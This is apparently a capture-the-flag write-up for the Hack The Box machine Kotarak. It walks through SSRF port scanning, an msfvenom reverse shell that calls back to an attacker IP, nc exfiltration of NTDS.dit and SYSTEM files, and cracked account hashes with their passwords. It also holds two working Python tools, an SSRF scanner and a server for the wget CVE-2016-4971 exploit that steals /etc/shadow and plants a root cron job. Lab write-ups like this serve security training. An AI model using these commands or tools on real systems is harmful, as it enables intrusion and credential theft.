HTB Write-up Kotarak

nmap:

PORT      STATE    SERVICE  VERSION
22/tcp    open     ssh      OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 e2:d7:ca:0e:b7:cb:0a:51:f7:2e:75:ea:02:24:17:74 (RSA)
|   256 e8:f1:c0:d3:7d:9b:43:73:ad:37:3b:cb:e1:64:8e:e9 (ECDSA)
|_  256 6d:e9:26:ad:86:02:2d:68:e1:eb:ad:66:a0:60:17:b8 (ED25519)
1112/tcp  filtered msql
6002/tcp  filtered X11:2
8009/tcp  open     ajp13    Apache Jserv (Protocol v1.3)
| ajp-methods: 
|   Supported methods: GET HEAD POST PUT DELETE OPTIONS
|   Potentially risky methods: PUT DELETE
|_  See https://nmap.org/nsedoc/scripts/ajp-methods.html
8080/tcp  open     http     Apache Tomcat 8.5.5
| http-methods: 
|_  Potentially risky methods: PUT DELETE
|_http-favicon: Apache Tomcat
|_http-title: Apache Tomcat/8.5.5 - Error report
10009/tcp filtered swdtp-sv
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

8009 enum:

PORT     STATE SERVICE VERSION
8009/tcp open  ajp13   Apache Jserv (Protocol v1.3)
| ajp-request: 
| AJP/1.3 404 404
| Content-Type: text/html;charset=utf-8
| Content-Language: en
| Content-Length: 992
| 
|_<!DOCTYPE html><html><head><title>Apache Tomcat/8.5.5 - Error report</title><style type="text/css">H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:16px;} H3 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:14px;} BODY {font-family:Tahoma,Arial,sans-serif;color:black;background-color:white;} B {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;} P {font-family:Tahoma,Arial,sans-serif;background:white;color:black;font-size:12px;}A {color : black;}A.name {color : black;}.line {height: 1px; background-color: #525D76; border: none;}</style> </head><body><h1>HTTP Status 404 - /</h1><div class="line"></div><p><b>type</b> Status report</p><p><b>message</b> <u>/</u></p><p><b>description</b> <u>The requested resource is not available.</u></p><hr class="line"><h3>Apache Tomcat/8.5.5</h3></body></html>
| ajp-headers: 
|   Content-Type: text/html;charset=utf-8
|   Content-Language: en
|_  Content-Length: 992
| ajp-methods: 
|   Supported methods: GET HEAD POST PUT DELETE OPTIONS
|   Potentially risky methods: PUT DELETE
|_  See https://nmap.org/nsedoc/scripts/ajp-methods.html

8080 enum:

Apache Tomcat/8.5.5

dirsearch result:

/examples/
index.jsp
manager

index.jsp took me to the default Tomcat page.

Attempted logging in to host-manager but got the 401 page, which shows the sample tomcat-users.xml entry with the password s3cret.

s3cret?

tomcat / s3cret didn't work.. lol

After running a full-port scan, I found port 60000 open as well.

Possibly an SSRF/LFI vuln?

It looks like you can enter any URL for it to browse, so I entered my own machine's address while serving a Python HTTP server.

It worked: the box fetched the page from me, so we have SSRF.

If the User-Agent of the incoming request had shown something exploitable we could have gone after that, but not this time.

Let's enter some values like file://etc/passwd (note that the correct form is file:///etc/passwd; with only two slashes, "etc" is parsed as the host).

ok..

Now we can fuzz the local ports through the SSRF with wfuzz:

wfuzz -z range,1-65535 http://10.129.1.117:60000/url.php\?path=http://localhost:FUZZ

Got a bunch of results with 2 lines (2 L), which is the response for a closed port, so let's filter those out:

wfuzz -z range,1-65535 --hl=2 http://10.129.1.117:60000/url.php\?path=http://localhost:FUZZ
  • --hl=2 hides every response whose body has exactly 2 lines

Now we can see some stuff coming back from the ports that are actually listening.

On port 888, found a file server.

Because the request to port 888 is nested inside url.php?path=, any ? or = in its own path has to be URL-encoded (%3F, %3D), otherwise url.php consumes them. After URL encoding the last part of the request with Burp, I was able to see the content:
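As an added example (my own code, not from the write-up), here is the same two-step abuse of url.php?path= in Python: a helper that builds the nested URL with the inner URL percent-encoded so that ? and = reach the backend instead of url.php, and a scanner that reproduces the wfuzz --hl=2 logic by comparing each response's line count against the closed-port baseline. The endpoint address is the one from the wfuzz command above; the fetcher is injected so the logic can be exercised with constructed responses, and the live helper uses urllib.

```python
import urllib.parse
import urllib.request

# SSRF endpoint taken from the wfuzz command in the write-up.
SSRF_BASE = "http://10.129.1.117:60000/url.php"


def ssrf_url(inner_url, base=SSRF_BASE):
    """Wrap inner_url in the vulnerable url.php?path= parameter.

    quote(safe="") encodes ':', '/', '?', '=' and '&', so a query string
    inside inner_url (e.g. ?doc=...) survives to the backend service instead
    of being parsed as a parameter of url.php itself.
    """
    return base + "?path=" + urllib.parse.quote(inner_url, safe="")


def fetch(url, timeout=5):
    """Live helper: return the body the SSRF endpoint hands back for url."""
    with urllib.request.urlopen(url, timeout=timeout) as resp:
        return resp.read().decode("utf-8", "replace")


def find_open_ports(fetcher, ports, host="localhost", baseline=None):
    """Replicate wfuzz --hl: report ports whose response line count differs
    from the closed-port baseline (2 lines on this box).

    fetcher(url) -> body.  Pass fetch for a real target, or a stub for testing.
    Returns {port: body} for the ports that look open.
    """
    if baseline is None:
        # Establish the baseline from a port nothing should be listening on.
        baseline = fetcher(ssrf_url(f"http://{host}:1")).count("\n")
    found = {}
    for port in ports:
        body = fetcher(ssrf_url(f"http://{host}:{port}"))
        if body.count("\n") != baseline:
            found[port] = body
    return found


if __name__ == "__main__":
    # Example: scan the common internal ports through the SSRF.
    for port, body in find_open_ports(fetch, [80, 888, 8009, 8080]).items():
        print(f"port {port}: {len(body)} bytes")
```

The baseline approach is what makes the scan reliable: a closed port, a refused connection and an error page can all look different from each other, so compare against what the endpoint returns for a port you know is closed rather than against an empty body.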

username: admin

password: 3@g01PdhB!

Now we are finally in the Tomcat manager (the admin portal).

Make a WAR reverse shell with msfvenom:

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.16.14 LPORT=7777 -f war > shell.war

Started an nc listener on port 7777, deployed the WAR file through the manager, and got an initial shell back once it ran.

Spawn a proper tty: python -c 'import pty;pty.spawn("/bin/bash")'

The backups directory looks interesting.

find . is useful here to turn up hidden files.

Started a listener on Kali: nc -nvlp 443 > SYSTEM

On the victim: nc 10.10.16.14 443 < 20170721114637_default_192.168.110.133_psexec.ntdsgrab._089134.bin

Did the same for the other file (the .dit). nc gives no progress indication and no integrity check, so compare md5sum on both ends before trusting the copy.

Now we've got the two files on our machine.

What is the NTDS.dit File?

The NTDS.dit file is the database that stores Active Directory data, including information about user objects, groups and group membership. It includes the password hashes for all users in the domain. With these hashes an attacker can use tools such as Mimikatz to perform pass-the-hash attacks, or tools like Hashcat to crack the passwords. Extraction and cracking happen offline, so the cracking itself generates no events on the domain. Once an attacker has the hashes, they can act as any user in the domain, including Domain Administrators.

Extracting Hashes and Domain Info From .dit

If you have the NTDS.dit file and the SYSTEM hive (the hive holds the boot key needed to decrypt the hashes), you can simply use secretsdump.py from impacket to extract all the NT hashes, but before we begin we need the files on our own machine. I'm going to use a simple Python HTTP server to transfer the files from the remote victim to my local machine.

It took forever to download these files! I tried the nc method first, but without any progress indication the files kept ending up corrupted (check md5sum on both sides; a truncated .dit just makes secretsdump fail).

python secretsdump.py -ntds 20170721114636_default_192.168.110.133_psexec.ntdsgrab._333512.dit -system 20170721114637_default_192.168.110.133_psexec.ntdsgrab._089134.bin LOCAL

Output

Administrator:500:aad3b435b51404eeaad3b435b51404ee:e64fe0f24ba2489c05e64354d74ebd11:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WIN-3G2B0H151AC$:1000:aad3b435b51404eeaad3b435b51404ee:668d49ebfdb70aeee8bcaeac9e3e66fd:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:ca1ccefcb525db49828fbb9d68298eee:::
WIN2K8$:1103:aad3b435b51404eeaad3b435b51404ee:160f6c1db2ce0994c19c46a349611487:::
WINXP1$:1104:aad3b435b51404eeaad3b435b51404ee:6f5e87fd20d1d8753896f6c9cb316279:::
WIN2K31$:1105:aad3b435b51404eeaad3b435b51404ee:cdd7a7f43d06b3a91705900a592f3772:::
WIN7$:1106:aad3b435b51404eeaad3b435b51404ee:24473180acbcc5f7d2731abe05cfa88c:::
atanas:1108:aad3b435b51404eeaad3b435b51404ee:2b576acbe6bcfda7294d6bd18041b8fe:::

Time to crack some hashes!

Since the box is Linux and not Windows, pass-the-hash won't get us anywhere, so we have to crack them. And we don't care about the machine accounts (the ones ending in $).

Administrator:500:aad3b435b51404eeaad3b435b51404ee:e64fe0f24ba2489c05e64354d74ebd11:::

atanas:1108:aad3b435b51404eeaad3b435b51404ee:2b576acbe6bcfda7294d6bd18041b8fe:::

The format is user:rid:lm:nt:::, so cut before the fourth colon and keep only the last field, the NT hash (the aad3b435... LM field is the empty-LM placeholder and is useless).

Used an online hash-cracking site to crack them.

Administrator cracked:

f16tomcat!

atanas - Password123!

Let's try to SSH in with these.

Couldn't get in...

Tried su - atanas with the other password instead, and it worked.

So it looks like SSH is not enabled for this account, but a local su with the same credentials is.

Priv Esc

In /root we can actually read app.log and flag.txt.

app.log shows requests coming in from wget 1.16...

Let's run searchsploit to see what we have for that version.

Exploit-DB: https://www.exploit-db.com/exploits/40064 (GNU Wget < 1.18 arbitrary file upload / remote code execution, CVE-2016-4971: when the server redirects from HTTP to FTP, wget saves the download under the FTP-supplied file name, so a .wgetrc can be planted in the calling user's home directory)

  1. Pasted the .wgetrc content from the exploit into the /dev/shm folder (the FTP server will serve it from there)

You cannot bind a Python server to port 21 (or 80) as a normal user, but the box has authbind installed, which lets an unprivileged user bind privileged ports.

Uploaded the wget exploit file to the victim (modified some parts).

Used wget -r http://IP/exploit.py to transfer the file.

Changed the HTTP listening address to 0.0.0.0.

In summary: the Python HTTP server and the FTP server have to run on the victim's machine (that is where the root cron job's wget connects), and nc runs on the attacker's machine.

The exploit's default cron job writes the output of id to a marker file, and it shows up:

/root/hacked-via-wget
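To make the moving parts of that summary concrete, here is an added Python reconstruction of the HTTP half of the technique from the referenced Exploit-DB entry (my own code, not the exploit script and not the write-up's). The FTP host address, the output paths and the marker file name are assumptions held in constants; the FTP side (serving .wgetrc from /dev/shm, for example with python3 -m pyftpdlib -p 21 -d /dev/shm under authbind) is separate. First request from the victim's wget: 301 to ftp://.../.wgetrc, which the vulnerable wget saves as .wgetrc in $HOME. Second request: wget now honours that .wgetrc, POSTs post_file to us and writes our response to output_document, a cron.d entry that root's cron runs.

```python
import http.server
import socketserver

# Assumed values; the write-up does not show them.
FTP_HOST = "10.0.3.1"                           # where the victim's wget can reach our FTP server
HTTP_PORT = 80                                  # the port the cron job's wget talks to (authbind as non-root)
POST_FILE = "/etc/shadow"                       # file the victim's next wget run will POST to us
OUTPUT_DOC = "/etc/cron.d/wget-root-shell"      # where wget will write our second response
MARKER = "/root/hacked-via-wget"                # proof file the cron job creates


def build_wgetrc(post_file=POST_FILE, output_document=OUTPUT_DOC):
    """The .wgetrc that the redirect tricks wget into saving in root's $HOME.
    Both keys are standard wgetrc commands: post_file sends a file as the request
    body, output_document overrides the path the response is written to."""
    return f"post_file = {post_file}\noutput_document = {output_document}\n"


def build_cron_payload(marker=MARKER):
    """Served on the second request; wget writes it to /etc/cron.d via output_document."""
    return f"* * * * * root /usr/bin/id > {marker}\n"


def redirect_location(ftp_host=FTP_HOST, filename=".wgetrc"):
    """Stage 1: HTTP 301 to an FTP URL.  wget < 1.18 keeps the FTP-side file name,
    so the download lands as .wgetrc instead of under the originally requested name."""
    return f"ftp://anonymous@{ftp_host}/{filename}"


class WgetExploitHandler(http.server.BaseHTTPRequestHandler):
    stage = {"redirected": False}   # shared across requests on purpose

    def do_GET(self):
        if not self.stage["redirected"]:
            self.stage["redirected"] = True
            self.send_response(301)
            self.send_header("Location", redirect_location())
            self.end_headers()
        else:
            self._serve_cron()

    def do_POST(self):
        # With post_file set, wget sends the stolen file as the request body.
        length = int(self.headers.get("Content-Length", 0))
        body = self.rfile.read(length)
        with open("stolen_post_file", "wb") as fh:
            fh.write(body)
        self._serve_cron()

    def _serve_cron(self):
        payload = build_cron_payload().encode()
        self.send_response(200)
        self.send_header("Content-Type", "text/plain")
        self.send_header("Content-Length", str(len(payload)))
        self.end_headers()
        self.wfile.write(payload)


class ReusableServer(socketserver.TCPServer):
    allow_reuse_address = True


def serve(port=HTTP_PORT, bind="0.0.0.0"):
    with ReusableServer((bind, port), WgetExploitHandler) as srv:
        srv.serve_forever()


if __name__ == "__main__":
    serve()
```

The cron file is only honoured if it is owned by root and not world-writable, which is why the write has to come from root's own wget and not from something we could drop as atanas. Put the wgetrc text from build_wgetrc into /dev/shm/.wgetrc for the FTP server, run the HTTP server under authbind, and wait for the cron job's next fetch.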
